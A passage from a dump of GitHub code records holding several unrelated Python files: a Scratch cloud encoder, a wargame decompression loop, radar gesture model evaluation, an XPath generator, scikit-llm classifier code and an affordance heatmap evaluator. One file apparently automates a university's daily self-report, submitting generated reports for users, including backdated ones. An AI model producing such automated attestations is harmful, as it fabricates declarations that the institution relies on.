string = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-+=[]{}\\\\\\\"'/?.,<>:\"\n        encoded = \"\"\n\n        for i in data:\n            if i in string:\n                index = string.find(i)\n                if index < 10:\n                    index = \"0\" + str(index)\n                encoded += str(index)\n        \n        return encoded\n    \n    def decodeData(self, data : str):\n        # character table must be identical to the one in encodeData, otherwise indices shift after the backslash\n        string = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-+=[]{}\\\\\\\"'/?.,<>:\"\n        decoded = \"\"\n\n        for i in range(0, len(data), 2):\n            current_num = data[i] + data[i + 1]\n            current_num = int(current_num)\n\n            decoded += string[current_num]\n        \n        return decoded\n","repo_name":"Ancoder2009/static.cdn.ancoder.ml","sub_path":"scratch_api_py/cloud.py","file_name":"cloud.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}{"seq_id":"73201312681","text":"import zlib, bz2, time\n\nwith open(\"package.pack\", \"rb\") as f:\n    data = f.read()\n    print(data[:10])\n    rs = ''\n    while True:\n        # print(\"run\", data[:10], \"~~\", data[-10:])\n        # time.sleep(1)\n        if data.startswith(b'x\\x9c'):\n            print(\"startswith : \", data[:5], \"~\", data[-5:])\n            data = zlib.decompress(data)\n            rs += '#';\n        elif data.startswith(b'BZh'): \n            print(\"startswith : \", data[:5], \"~\", data[-5:])\n            data = bz2.decompress(data)\n            rs += ' ';\n        elif data.endswith(b'\\x9cx'):\n            print(\"endswith : \", data[:5], \"~\", data[-5:])\n            data = data[::-1]\n            rs += '\\n';\n        else:\n            print(data)\n            break\n    print(data)\n    print(rs)\n\n\n# with open(\"level20.zip\", 'rb') as f:\n#     data = f.read()\n#     time.sleep(1)\n    # print(data[:5], \"~~\", data[-5:])","repo_name":"Fhwang0926/study.wargame.python-challenge","sub_path":"21/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}{"seq_id":"31562580040","text":"import 
numpy as np\nimport xlsxwriter\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import axes3d\nfrom tensorflow import keras\nfrom matplotlib import gridspec\n\nworkbook = xlsxwriter.Workbook('write_data.xlsx')\nworksheet = workbook.add_worksheet()\n\ndef show_trace(cam,out,title):\n\n print(np.shape(cam))\n print(np.shape(out))\n cam = cam/0.015\n out = out/0.015\n mark = \",\"\n size = 1\n fig = plt.figure()\n spec = gridspec.GridSpec(ncols=2, nrows=1)\n ax0 = fig.add_subplot(spec[0])\n\n ax0.set_title('X-Y plane', color='black')\n ax0.scatter(cam[:, 0], cam[:, 1],s=size, marker=mark)\n ax0.plot(cam[:, 0], cam[:, 1])\n ax0.scatter(out[:, 0], out[:, 1], s=size, marker=mark)\n ax0.plot(out[:, 0], out[:, 1])\n # ax0.set_xlim(-10, 10)\n # ax0.set_ylim(-10, 10)\n ax0.set_xlabel(\"x(cm)\")\n ax0.set_ylabel(\"y(cm)\")\n ax0.set_aspect(1)\n ax0.legend()\n\n ax1 = fig.add_subplot(spec[1])\n ax1.scatter(cam[:, 0], cam[:, 2],s=size, marker=mark)\n ax1.plot(cam[:, 0], cam[:, 2])\n ax1.scatter(out[:, 0], out[:, 2],s=size, marker=mark)\n ax1.plot(out[:, 0], out[:, 2])\n # ax1.set_xlim(-10, 10)\n # ax1.set_ylim(-10, 10)\n ax1.set_xlabel(\"x(cm)\")\n ax1.set_ylabel(\"z(cm)\")\n ax1.set_aspect(1)\n ax1.set_title('X-Z plane', color='black')\n ax1.legend()\n fig.tight_layout()\n plt.suptitle(title)\n plt.show()\n # plt.savefig(path+\"Trace(t2+t3)timestep12.png\")\n # plt.close()\n\ndef mean_square_error( x, y, title):\n cc = 0\n errorx = 0\n errory = 0\n errorz = 0\n stdx = []\n stdy = []\n stdz = []\n for i in range(len(x)):\n if y[i,0]== 0 and y[i,1]== 0 and y[i,2]== 0:\n pass\n else:\n errorx += (((x[i, 0] - y[i, 0])/0.015)**2)\n errory += (((x[i, 1] - y[i, 1])/0.015)**2)\n errorz += (((x[i, 2] - y[i, 2])/0.015)**2)\n stdx.append((x[i, 0]- y[i, 0])/0.015)\n stdy.append((x[i, 1]- y[i, 1])/0.015)\n stdz.append((x[i, 2]- y[i, 2])/0.015)\n cc +=1\n # std_x = np.sqrt(sum(stdx - np.mean(stdx)))\n # std_y = np.sqrt(sum(stdy - np.mean(stdy)))\n # std_z = np.sqrt(sum(stdz - np.mean(stdz)))\n std_x = np.std(stdx)\n std_y = np.std(stdy)\n std_z = np.std(stdz)\n print(\"\\n----- {} -----\".format(title))\n print(\"std x:{} y:{} z:{}\".format(np.round(std_x,3),np.round(std_y,3),np.round(std_z,3)))\n print(\"MSE error x:{} y:{} z:{}\".format(np.round(errorx/cc,3),np.round(errory/cc,3),np.round(errorz/cc,3)))\n errorxy = (errorx / cc + errory / cc)/2\n stdxy = (std_x + std_y )/2\n errorxz = (errorx / cc + errorz / cc) / 2\n stdxz = (std_x + std_z) / 2\n\n print(\"XY mse:{} std:{}\" .format(np.round(errorxy,3),np.round(stdxy,3)))\n print(\"XZ mse:{} std:{}\".format(np.round(errorxz,3),np.round(stdxz,3)))\n\n return errorx/cc, errory/cc, errorz/cc, std_x, std_y, std_z\n\n# Gesture = [\"circle\"]\n# Gesture = [\"circle\", \"eight\", \"rectangle\", \"up\", \"down\", \"left\", \"right\"]\nGesture = [\"circle\", \"down\"]\nhead_path = 'C:/Users/user/Desktop/thmouse_training_data/'\ntime = 0\nfor i in Gesture:\n for j in range(2, 3):\n tmp_path = head_path + i + \"/time\" + str(j) + \"/\"\n title = i + \" of /time\" + str(j) + \" /light_nonesliding_larrysrc_timestep12\"\n path = tmp_path\n out_cam_p = np.load(path + 'out_cam_p.npy', allow_pickle=True)\n radar = np.load(path + 'out_radar_p_larry.npy', allow_pickle=True)\n # radar = np.load(path + 'out_radar_p.npy', allow_pickle=True)\n out_radar_p = np.load(path + 'out_center_p.npy', allow_pickle=True)\n start_len = 128\n end_len = 140\n out_cam_p = out_cam_p[start_len:end_len,:,8]\n out_radar_p = out_radar_p[start_len:end_len]\n # radar = 
np.reshape(radar[start_len:end_len],[-1,20,1,25,25,25])\n # radar = np.reshape(radar[start_len:end_len],[-1,12,1,25,25,25])\n # radar = np.reshape(radar[start_len:end_len],[-1,4,1,25,25,25])\n radar = np.reshape(radar[start_len:end_len],[-1,3,1,25,25,25])\n # radar = np.reshape(radar[20:140],[-1,3,1,25,25,25])\n # x, y, z, stdx, stdy, stdz =mean_square_error(out_cam_p, out_radar_p,title)\n # show_error(out_cam_p, out_radar_p, x, y, z, stdx, stdy, stdz, title, tmp_path)\n\n model = keras.models.load_model(\"D:\\\\pythonProject\\\\ML_thumouse\\\\New_model_adam\\\\light_nonesliding_larrysrc_timestep12.h5\")\n\n out = model.predict(radar)\n out = np.reshape(out,[-1,3])\n # tmp_outcamp = out_cam_p[3::4]\n show_trace(out_cam_p,out,title)\n mean_square_error(out_cam_p,out,\"\")\n\n\n## single test\n\n\n# tmp_path = 'C:/Users/user/Desktop/thmouse_training_data/'\n#\n# path = tmp_path\n# out_cam_p = np.load(path + 'out_cam_p.npy', allow_pickle=True)\n# radar = np.load(path + 'out_radar_p.npy', allow_pickle=True)\n# out_radar_p = np.load(path + 'out_center_p.npy', allow_pickle=True)\n# start_len = 0\n# end_len =40\n# out_cam_p = out_cam_p[start_len:end_len,:,8]\n# out_radar_p = out_radar_p[start_len:end_len]\n# # radar = np.reshape(radar[20:140],[-1,12,1,25,25,25])\n# radar = np.reshape(radar[start_len:end_len],[-1,4,1,25,25,25])\n# # radar = np.reshape(radar[20:140],[-1,3,1,25,25,25])\n# # x, y, z, stdx, stdy, stdz =mean_square_error(out_cam_p, out_radar_p,title)\n# # show_error(out_cam_p, out_radar_p, x, y, z, stdx, stdy, stdz, title, tmp_path)\n#\n# model = keras.models.load_model(\"D:\\\\pythonProject\\\\ML_thumouse\\\\t2t3新方法.h5\")\n# out = model.predict(radar)\n# out = np.reshape(out,[-1,3])\n#\n# tmp_outcamp = out_cam_p[4::4]\n# show_trace(tmp_outcamp,out)","repo_name":"t109368038/ML_thumouse","sub_path":"code_val_reslut/traceline.py","file_name":"traceline.py","file_ext":"py","file_size_in_byte":5584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74417139881","text":"import sys\nimport os\nroot_path = os.path.dirname(os.path.abspath(__file__))\nsrc_path = os.path.join(root_path,\"src\")\nsys.path.extend([root_path, src_path])\n\nimport datetime\nimport logging\nimport os\nimport time\nimport traceback\nimport ast\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nfrom apscheduler.events import EVENT_JOB_EXECUTED, EVENT_JOB_ERROR\n\nfrom login.login import Loginer\nfrom report.report import Reporter\nfrom fstate.generator import FstateGenerator\nfrom mail.send_email import Emailer\n\nfrom config import config\n\ncur_dir_path = os.path.dirname(os.path.abspath(__file__))\n\n\n\n# 配置日志显示\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename=os.path.join(cur_dir_path,\"log\",\"report.log\"),\n filemode='a')\n\n\n\nclass Launcher:\n\n REPORT_TIMEOUT = 45 # 报送时间间隔\n ADMIN_EMAIL = config['email']['admin']\n \n def __init__(self) -> None:\n self.loginer = Loginer() # 登录器\n self.reporter = Reporter() # 报送器\n self.fstate_generator = FstateGenerator() # fstate生成器\n self.emailer = Emailer() # 邮件发送器\n\n\n def autoreport(self, user_info: dict, date: datetime):\n \"\"\"按传入的日期进行报送\n Args:\n user_info (dict): 用户信息\n date (datetime): 日期\n \"\"\"\n try:\n session = self.loginer.login(user_info['username'], user_info['password'])\n fstate = self.fstate_generator.generate_fstate(date, user_info)\n report_result = 
self.reporter.report(session, date, user_info, fstate)\n if report_result:\n return report_result\n except:\n logging.info(f\"AutoReport fail\")\n logging.info(traceback.format_exc())\n\n @staticmethod\n def str_to_datetime(date_str: str):\n if date_str:\n return datetime.datetime.strptime(date_str, \"%Y-%m-%d\")\n return \n\n def history_report(self,user_info: dict,today:datetime):\n history_date = self.str_to_datetime(user_info['history_report_begin_date'])\n if history_date and history_date <= today:\n logging.info(f\"begin history report from:{history_date}\")\n while history_date <= today:\n report_result = self.autoreport(user_info, history_date)\n if report_result:\n if ast.literal_eval(user_info[\"success_email\"]):\n self.emailer.send_email(history_date, user_info['email_address'], user_info['email_type'])\n else:\n self.emailer.send_email(today, self.ADMIN_EMAIL, email_type=user_info['email_type'], identity=\"admin\", user_id=user_info['username'])\n time.sleep(self.REPORT_TIMEOUT)\n history_date = history_date + datetime.timedelta(days=1)\n\n def today_report(self,user_info: dict,today:datetime):\n report_result = self.autoreport(user_info, today)\n if report_result:\n if ast.literal_eval(user_info[\"success_email\"]):\n self.emailer.send_email(today, user_info['email_address'], email_type=user_info['email_type'])\n else:\n self.emailer.send_email(today, self.ADMIN_EMAIL, email_type=user_info['email_type'], identity=\"admin\", user_id=user_info['username'])\n\n def main(self):\n try:\n today = datetime.datetime.today()\n for key, user_info in config.items():\n # 判断用户\n if \"user\" in key:\n # 历史报送\n self.history_report(user_info,today)\n # 今日报送\n self.today_report(user_info,today)\n time.sleep(self.REPORT_TIMEOUT)\n except:\n self.emailer.send_email(today, self.ADMIN_EMAIL, email_type=user_info['email_type'], identity=\"admin\")\n logging.info(f\"Report fail\")\n logging.info(traceback.format_exc())\n\ndef crontab_listener(event):\n if event.exception:\n logging.error('autoreport failed!!!')\n else:\n logging.info('autoreport success...')\n\nif __name__ == \"__main__\":\n scheduler = BlockingScheduler()\n launcher = Launcher()\n # launcher.main()\n scheduler.add_job(func=launcher.main, trigger='cron', hour=6, minute=50, id='cron_task')\n\n # 配置任务执行完成和执行错误的监听\n scheduler.add_listener(crontab_listener, EVENT_JOB_EXECUTED | EVENT_JOB_ERROR)\n\n # 设置日志\n scheduler._logger = logging\n\n scheduler.start()\n","repo_name":"FomalHauts/SHU-SelfReport","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"71182519400","text":"# Daniel Ryaboshapka and Sam Chung \n# Robula+ Implementation in Python 3.7 \n# Instead of Robula+, its Robula- \n\nfrom bs4 import BeautifulSoup \nfrom lxml import html, etree \nimport re \nfrom absolute_xpath import getAbsXpaths\nfrom timeout import TimeoutError\n\nGLOBAL_TIMEOUT = 0\n\n#########################################################################\n### NAME DEFINITIONS ###\n### ###\n### xp = The XPATH expression to specialize --> //td ###\n### N = The length (in nodes/levels) of variable xp ###\n### |--> //td => N=1 ###\n###\t\t\t\t\t\t//*//td => N=2 ### \n### L = The list of the ancestors of target elem e in the ### \n### considered DOM, starting and including e ###\n### 
###\n#########################################################################\n\n#########################################################################\n### TRANFORMATIONS ###\n### ###\n#########################################################################\n\n\n# Precondition: Xpath xp starts with //* \n# Action: replace initial * with tag name of the DOM elem L.get(N)\n# Example: INPUT: xp = //*/td and L.get(2).getTagName() = tr \n#\t\t\t\tOUTPUT: //tr//td\ndef transfConvertStar(xp, tagname):\n if xp.startswith('//*'):\n xp = xp.replace('*',tagname)\n return xp \n\n# Precondition: the Nth level of xp does not contain already any kind of predicates \n# Action: for each available attribute-value pair of the DOM element L.get(N), generate a \n#\t\t\t\tcandidate locator by adding a predicate based on such value \n#\t\t\t\tto the higher level of xp\n# Example: INPUT: xp = //tr/td & L.get(2).getAttributes() = {name: 'data', class: 'table-row'}\n#\t\t\t\tOUTPUT: //tr[@name='data']/td & //tr[@class='table-row']/td\n# TODO: Maybe make attribute parsing a function? Esp with blacklist involved...\ndef transfAddAttribute(xp, attributes, tagname, blacklist_tags):\n temp = xp.replace(\"//\", \"\")\n elements = temp.split(\"/\")\n target = elements[0]\n xpaths = []\n if \"[@\" in target: \n xpaths.append('//' + target + xp[(2+len(target)):])\n return xpaths\n attrstrings = [] \n seen_keys = []\n if attributes != []: \n for key in attributes: \n if key not in blacklist_tags and key not in seen_keys:\n if type(attributes[key]) == list:\n if key == \"class\": \n full_attribute = \"\"\n for item in attributes[key]:\n full_attribute += item + \" \"\n full_attribute = full_attribute[:-1]\n attrstrings.append(\"[@\" + key + \"=\\\"\" + full_attribute + \"\\\"]\")\n else:\n attrstrings.append(\"[@\" + key + \"=\\\"\" + attributes[key][0] + \"\\\"]\")\n else: \n attrstrings.append(\"[@\" + key + \"=\\\"\" + attributes[key] + \"\\\"]\")\n seen_keys.append(key)\n for attr in attrstrings: \n xpaths.append('//' + target + attr + xp[(2+len(target)):])\n return xpaths\n\n# Precondition: the Nth level of xp does not contain already any predicate on position\n# Action: add the position of the element L.get(N) to the higher level of xp \n# Example: INPUT: xp = //tr/td and L.get(2).getPosition() = {if tag-name=2, if '*'=3}\n#\t\t\t\tOUTPUT: //tr[2]/td\ndef transfRemovePosition(tagname):\n pattern = re.compile(r'(\\[[\\d]*)')\n match = pattern.findall(tagname)\n fixed = \"\"\n if len(match) > 0:\n match = pattern.findall(tagname)[0] + \"]\"\n fixed = tagname.replace(match, \"\")\n else: \n fixed = tagname\n return fixed \n\n# Precondition: N < L.length()\n# Action: add //* at the top of xp \n# Example: INPUT: //tr//td\n#\t\t\t\tOUTPUT: //*/tr/td\ndef transfAddLevel(xp, n, l):\n if n < l: \n xp = xp.replace(\"//\", \"/\")\n return \"//*\" + xp\n else: \n return xp \n\n#########################################################################\n### AUXILIARY FUNCTIONS ###\n### ###\n#########################################################################\n\n# return the depth of the element \ndef N(xp): \n return len(xp.split(\"/\")) - 2\n\n# return the height of the whole path \ndef L(xpath): \n temp = xpath.replace(\"//\", \"\")\n elements = temp.split(\"/\")\n if temp[-1] == \"/\":\n elements.pop()\n \n return elements\n\n# returns the element in dom selected by the xpath locator xpath\ndef eval(xpath, document):\n # print(xpath)\n try: \n return document.xpath(xpath)\n except: \n return \"invalid\"\n\n# TRUE iff 
eval(x, d) contains only e\n# Has to be changed to uniquely locates as we are making a generic xpath\n# Algorithm: If the xpath generated sends us back the same list of elems,\n# then the xpath can generalize to finding a group of elems\n# Query the document using the xpath passed in\n# if the result is similar to elems, then return True,\n# else return False \n# TESTING REQUIRED, BUT BEING 1 or 2 off is our current design choice \n# IF IT HAS NO ATTRIBUTES TO WORK WITH, IT IS TOO GENERAL FOR US \n# print(\"IS %s LOCATABLE IN THE DOM?\" % (xpath))\n# TODO: Fix documentation\ndef generalLocates(xpath, document, elem):\n if \"[\" not in xpath: \n return False\n else:\n elems = eval(xpath, document)\n if elems == \"invalid\": \n return False\n elems = [html.tostring(elem).decode('utf-8') for elem in elems]\n return elem in elems\n\n# Parse tagname and remove positions first \n# TODO: Add documentation\ndef getAttributes(elem, tagname):\n fixed = transfRemovePosition(tagname)\n soup = BeautifulSoup(elem, 'lxml')\n tag = soup.find(fixed)\n if tag == None:\n return [] \n else:\n return tag.attrs\n\n# TODO: Add documentation\ndef buildXPath(xpath_list):\n string = \"//\"\n for elem in xpath_list:\n string += elem + \"/\"\n return string[:-1]\n\n# TODO: Add documentation and threading functionality\ndef RobulaPlus(xpath, elems, pathL, doc, blacklist, TARGET): \n xpath_list = []\n reverseL = pathL[::-1]\n for elem in elems:\n stringified = html.tostring(elem).decode('utf-8')\n XList = [\"//*\"]\n ctr = 0\n while True:\n if ctr > 50: \n raise TimeoutError\n # return []\n xp = XList.pop(0) # pop front of list\n temp = []\n currN = pathL[N(xp) - 1]\n new_elems = eval(buildXPath(reverseL[:-(N(xp) - 1)]), doc)\n new_elem = \"\"\n if len(new_elems) >= 1: \n if len(new_elems[0]) > 2000: \n new_elem = html.tostring(new_elems[1]).decode('utf-8')\n else: \n new_elem = html.tostring(new_elems[0]).decode('utf-8')\n xp1 = transfConvertStar(xp, currN)\n temp.append(xp1)\n xp2 = transfAddAttribute(xp1, getAttributes(new_elem, currN), currN, blacklist)\n\n if len(xp2) >= 1:\n for x in xp2: \n temp.append(x)\n temp.append(transfAddLevel(x, N(x), len(pathL)))\n else: \n temp.append(transfAddLevel(xp1,N(xp1), len(pathL)))\n\n for i, item in enumerate(temp): \n temp[i] = transfRemovePosition(item)\n # print(temp)\n for t in temp[::-1]: \n if generalLocates(t, doc, stringified):\n xpath_list.append(t)\n if len(xpath_list) == TARGET: \n return xpath_list\n else: \n XList.append(t)\n ctr += 1\n\n# TODO: Clean up main \ndef RunRobula(url, text, output, html_output, TARGET=4, blacklist_tags=['href', 'id', 'role', 'type', 'script'], TIMEOUT=10, page=None): \n global GLOBAL_TIMEOUT\n GLOBAL_TIMEOUT = TIMEOUT\n # print(\"Working url: %s\" % (url))\n # print(\"Working text xpath: %s\" % ('//*[contains(text(),' + '\"' + text + '\")]'))\n xpath = text\n\n document = html.fromstring(page)\n filtered = []\n xpaths = getAbsXpaths(document, xpath)\n # print(xpaths)\n for xp in xpaths:\n elems = eval(xp, document)\n if elems == \"invalid\":\n continue \n pathL = L(xp)\n # print(\"Iteration %d\" % (i))\n new_xpaths = []\n try: \n new_xpaths = RobulaPlus(xpath, elems, pathL[::-1], document, blacklist_tags, TARGET)\n except TimeoutError:\n continue\n if new_xpaths is not None:\n for xp2 in new_xpaths: \n if not xp2.startswith(\"//*\"): \n filtered.append(xp2) \n # print(\"FILTERED XPATHS FOUND: \", filtered)\n\n final_list = [] \n for item in filtered: \n if item not in final_list: \n final_list.append(item)\n \n if len(final_list) == 
0:\n # print(\"Robula could not find any xpaths in time. Try again...\")\n return\n\n with open(output, \"w\") as f: \n for line in final_list:\n f.write(line + \"\\n\")\n \n lens = []\n for item in final_list: \n xpath = item\n elems = eval(xpath, document)\n elems = [html.tostring(elem).decode('utf-8') for elem in elems]\n lens.append(len(elems))\n with open(html_output, \"a\") as f:\n f.write(\"Score: %d\\n\" % (len(elems)))\n for elem in elems: \n f.write(elem + \"\\n\")\n f.write(\"\\n\")\n best_index = lens.index(max(lens))\n print(\"Best XPATH found is: %s\" % (final_list[best_index]))\n\n","repo_name":"drybell/RobulaPython","sub_path":"scripts/robula_engine/run_robula.py","file_name":"run_robula.py","file_ext":"py","file_size_in_byte":9997,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"36238695735","text":"import random\nfrom abc import ABC, abstractmethod\nfrom collections import Counter\nfrom typing import Any, List, Optional, Union\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.base import BaseEstimator, ClassifierMixin\nfrom tqdm import tqdm\n\nfrom skllm.completions import get_chat_completion\nfrom skllm.openai.chatgpt import construct_message\nfrom skllm.openai.mixin import OpenAIMixin as _OAIMixin\nfrom skllm.utils import extract_json_key\nfrom skllm.utils import to_numpy as _to_numpy\n\n\nclass BaseClassifier(ABC, BaseEstimator, ClassifierMixin):\n default_label: Optional[str] = \"Random\"\n\n def _to_np(self, X):\n \"\"\"Converts X to a numpy array.\n\n Parameters\n ----------\n X : Any\n The input data to convert to a numpy array.\n\n Returns\n -------\n np.ndarray\n The input data as a numpy array.\n \"\"\"\n return _to_numpy(X)\n\n @abstractmethod\n def _predict_single(self, x: str) -> Any:\n \"\"\"Predicts the class of a single input.\"\"\"\n pass\n\n def fit(\n self,\n X: Optional[Union[np.ndarray, pd.Series, List[str]]],\n y: Union[np.ndarray, pd.Series, List[str], List[List[str]]],\n ):\n \"\"\"Extracts the target for each datapoint in X.\n\n Parameters\n ----------\n X : Optional[Union[np.ndarray, pd.Series, List[str]]]\n The input array data to fit the model to.\n\n y : Union[np.ndarray, pd.Series, List[str], List[List[str]]]\n The target array data to fit the model to.\n \"\"\"\n X = self._to_np(X)\n self.classes_, self.probabilities_ = self._get_unique_targets(y)\n return self\n\n def predict(self, X: Union[np.ndarray, pd.Series, List[str]]):\n \"\"\"Predicts the class of each input.\n\n Parameters\n ----------\n X : Union[np.ndarray, pd.Series, List[str]]\n The input data to predict the class of.\n\n Returns\n -------\n List[str]\n \"\"\"\n X = self._to_np(X)\n predictions = []\n for i in tqdm(range(len(X))):\n predictions.append(self._predict_single(X[i]))\n return predictions\n\n def _get_unique_targets(self, y: Any):\n labels = self._extract_labels(y)\n\n counts = Counter(labels)\n\n total = sum(counts.values())\n\n classes, probs = [], []\n for l, c in counts.items():\n classes.append(l)\n probs.append(c / total)\n\n return classes, probs\n\n def _extract_labels(self, y: Any) -> List[str]:\n \"\"\"Return the class labels as a list.\n\n Parameters\n ----------\n y : Any\n\n Returns\n -------\n List[str]\n \"\"\"\n if isinstance(y, (pd.Series, np.ndarray)):\n labels = y.tolist()\n else:\n labels = y\n return labels\n\n def _get_default_label(self):\n \"\"\"Returns the default label based on the default_label argument.\"\"\"\n if self.default_label == \"Random\":\n return 
random.choices(self.classes_, self.probabilities_)[0]\n else:\n return self.default_label\n\n\nclass _BaseZeroShotGPTClassifier(BaseClassifier, _OAIMixin):\n \"\"\"Base class for zero-shot classifiers.\n\n Parameters\n ----------\n openai_key : Optional[str] , default : None\n Your OpenAI API key. If None, the key will be read from the SKLLM_CONFIG_OPENAI_KEY environment variable.\n openai_org : Optional[str] , default : None\n Your OpenAI organization. If None, the organization will be read from the SKLLM_CONFIG_OPENAI_ORG\n environment variable.\n openai_model : str , default : \"gpt-3.5-turbo\"\n The OpenAI model to use. See https://beta.openai.com/docs/api-reference/available-models for a list of\n available models.\n default_label : Optional[Union[List[str], str]] , default : 'Random'\n The default label to use if the LLM could not generate a response for a sample. If set to 'Random' a random\n label will be chosen based on probabilities from the training set.\n prompt_template: str , A formattable string with the following placeholders: {x} - the sample to classify, {labels} - the list of labels.\n If None, the default prompt template will be used.\n \"\"\"\n\n def __init__(\n self,\n openai_key: Optional[str] = None,\n openai_org: Optional[str] = None,\n openai_model: str = \"gpt-3.5-turbo\",\n default_label: Optional[Union[List[str], str]] = \"Random\",\n prompt_template: Optional[str] = None,\n ):\n self._set_keys(openai_key, openai_org)\n self.openai_model = openai_model\n self.default_label = default_label\n self.prompt_template = prompt_template\n\n @abstractmethod\n def _get_prompt(self, x: str) -> str:\n \"\"\"Generates a prompt for the given input.\"\"\"\n pass\n\n def _get_chat_completion(self, x):\n prompt = self._get_prompt(x)\n msgs = []\n msgs.append(construct_message(\"system\", \"You are a text classification model.\"))\n msgs.append(construct_message(\"user\", prompt))\n completion = get_chat_completion(\n msgs, self._get_openai_key(), self._get_openai_org(), self.openai_model\n )\n return completion\n\n def _predict_single(self, x):\n \"\"\"Predicts the labels for a single sample.\n\n Should work for all (single label) GPT based classifiers.\n \"\"\"\n completion = self._get_chat_completion(x)\n try:\n label = str(\n extract_json_key(\n completion[\"choices\"][0][\"message\"][\"content\"], \"label\"\n )\n )\n except Exception as e:\n print(completion)\n print(f\"Could not extract the label from the completion: {str(e)}\")\n label = \"\"\n\n if label not in self.classes_:\n label = label.replace(\"'\", \"\").replace('\"', \"\")\n if label not in self.classes_: # try again\n label = self._get_default_label()\n return label\n\n\nclass _BasePaLMClassifier(BaseClassifier):\n def __init__(self, model: str, default_label: Optional[str] = \"Random\"):\n self.model = model\n self.default_label = default_label\n","repo_name":"iryna-kondr/scikit-llm","sub_path":"skllm/models/_base.py","file_name":"_base.py","file_ext":"py","file_size_in_byte":6251,"program_lang":"python","lang":"en","doc_type":"code","stars":2708,"dataset":"github-code","pt":"18"} +{"seq_id":"11828707853","text":"import torch\nimport argparse\nimport tqdm\nimport os \nimport glob\n\nfrom utils import evaluation\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--dset', default='opra')\nparser.add_argument('--load', default=None)\nparser.add_argument('--res', type=int, default=28)\nparser.add_argument('--batch_size', type=int, default=64)\nargs = 
parser.parse_args()\n#------------------------------------------------------------#\n\nimport data\nfrom data import opra, epic\nimport torch.nn.functional as F\ndef generate_gt(dset):\n\n    os.makedirs('data/%s/output/'%dset, exist_ok=True)\n\n    if dset=='opra':\n        dataset = opra.OPRAHeatmaps(root=data._DATA_ROOTS[dset], split='val') \n    elif dset=='epic':\n        dataset = epic.EPICHeatmaps(root=data._DATA_ROOTS[dset], split='val') \n\n    dataset.heatmaps = dataset.init_hm_loader() \n\n    heatmaps, keys = [], []\n    for index in tqdm.tqdm(range(len(dataset))):\n        entry = dataset.data[index]\n        hm_key = tuple(entry['image']) + (str(entry['verb']),)\n        heatmap = dataset.heatmaps(hm_key)\n        heatmap = torch.from_numpy(heatmap)\n        heatmap = F.interpolate(heatmap.unsqueeze(0).unsqueeze(0), size=(224, 224), mode='bilinear', align_corners=False)[0][0]\n        heatmap = heatmap/(heatmap.sum()+1e-12)\n\n        heatmaps.append(heatmap)\n        keys.append(hm_key)\n\n    heatmaps = torch.stack(heatmaps, 0)\n    print (heatmaps.shape)\n    torch.save({'heatmaps':heatmaps, 'keys':keys}, 'data/%s/output/gt.pth'%(dset))\n\n#------------------------------------------------------------#\n\nfrom models import intcam\ndef generate_heatmaps(dset, load, batch_size):\n\n    if dset=='opra':\n        testset = opra.OPRAHeatmaps(root=data._DATA_ROOTS[dset], split='val') \n    elif dset=='epic':\n        testset = epic.EPICHeatmaps(root=data._DATA_ROOTS[dset], split='val') \n\n    testloader = torch.utils.data.DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=2)\n\n    from models import rnn, backbones\n    torch.backends.cudnn.enabled = False\n    net = rnn.frame_lstm(len(testset.verbs), max_len=-1, backbone=backbones.dr50_n28)\n\n    checkpoint = torch.load(load, map_location='cpu')\n    weights = checkpoint['net']\n    net.load_state_dict(weights)\n    net.eval().cuda()\n    print ('Loaded checkpoint from %s'%os.path.basename(load))\n    \n    gcam = intcam.IntCAM(net)\n\n    heatmaps = []\n    for batch in tqdm.tqdm(testloader, total=len(testloader)):\n        \n        img, verb = batch['img'], batch['verb'] \n        masks = gcam.generate_cams(img.cuda(), [verb]) # (B, T, C, 7, 7)\n        mask = masks.mean(1) # (B, C, 7, 7) <-- average across hallucinated time dim\n        mask = mask.squeeze(1) # get rid of single class dim\n        heatmaps.append(mask.cpu())\n\n    heatmaps = torch.cat(heatmaps, 0) # (N, C, 7, 7)\n    print (heatmaps.shape)\n\n    keys = [testset.key(entry) for entry in testset.data]\n    torch.save({'heatmaps':heatmaps, 'keys':keys}, '%s.%s.heatmaps'%(load, dset))\n\n\n#------------------------------------------------------------#\n\nif __name__=='__main__':\n\n    # generate gt heatmaps if they do not already exist\n    if not os.path.exists('data/%s/output/gt.pth'%(args.dset)):\n        generate_gt(args.dset) # generate_gt() requires the dataset name\n\n    # generate heatmap predictions if they do not already exist\n    if args.load and not os.path.exists('%s.%s.heatmaps'%(args.load, args.dset)):\n        generate_heatmaps(args.dset, args.load, args.batch_size)\n        print ('loading checkpoint:', args.load)\n\n    gt = torch.load('data/%s/output/gt.pth'%(args.dset))\n    baselines = evaluation.Baselines(gt['heatmaps'].shape[0])\n    heval = evaluation.Evaluator(gt, res=args.res, log=args.load)\n\n    # Comment in other methods to compare\n    predictions = {\n        # 'center': baselines.gaussian(),\n        # 'egogaze': baselines.checkpoint('data/%s/output/egogaze.pth'%(args.dset)),\n        # 'mlnet': baselines.checkpoint('data/%s/output/mlnet.pth'%(args.dset)),\n        # 'deepgaze2': baselines.checkpoint('data/%s/output/deepgaze2.pth'%(args.dset)),\n        # 'salgan': baselines.checkpoint('data/%s/output/salgan.pth'%(args.dset)),\n        'hotspots': 
